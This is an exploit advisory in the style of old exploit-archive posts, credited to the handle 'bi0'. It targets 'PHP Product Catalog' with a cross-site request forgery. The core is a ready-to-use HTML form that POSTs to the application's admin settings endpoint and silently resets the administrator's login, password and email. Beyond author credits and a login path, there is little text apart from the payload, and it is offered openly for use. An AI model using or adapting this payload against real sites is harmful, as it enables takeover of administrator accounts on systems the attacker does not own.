45 lines
No EOL
1.4 KiB
Text
45 lines
No EOL
1.4 KiB
Text
______ __ ______
|
|
/\ == \ /\ \ /\ __ \
|
|
\ \ __< \ \ \ \ \ \/\ \
|
|
\ \_____\ \ \_\ \ \_____\
|
|
\/_____/ \/_/ \/_____/
|
|
|
|
01000010 01101001 01001111
|
|
|
|
[#]----------------------------------------------------------------[#]
|
|
#
|
|
# [+] PHP Product Catalog - [ CSRF ] Change Administrator Password
|
|
#
|
|
# // Author Info
|
|
# [x] Author: bi0
|
|
# [x] Contact: bukibv@hotmail.com
|
|
# [x] Thanks: Pig,packetdeath,redking,sp1r1t and all my friends
|
|
# [x] IRC : irc.clickshqip.com / #itsecurity
|
|
#
|
|
[#]-------------------------------------------------------------------------------------------[#]
|
|
#
|
|
# [x] Exploit :
|
|
#
|
|
# [ CSRF ]
|
|
#
|
|
# [ Login ]
|
|
# http://[server]/[path]/admin.php
|
|
#
|
|
# // Start CSRF
|
|
|-------------------------------------------------------------------------------|
|
|
|
|
<html>
|
|
<form action="http://[server]/admin.php?p=otherConfig&sOption=save" method="POST">
|
|
Admin : <input type="text" name="login" value="admin" size="5" /><br>
|
|
Passwd <input type="text" name="pass" value="123" size="5" /><br>
|
|
Email : <input type="text" name="email" value="test@example.com" size="16" /><br>
|
|
<input type="submit" name="save" value="Save">
|
|
</form>
|
|
</html>
|
|
|
|
|-------------------------------------------------------------------------------|
|
|
# // End of attack
|
|
#
|
|
[#]------------------------------------------------------------------------------------------[#]
|
|
|
|
#EOF |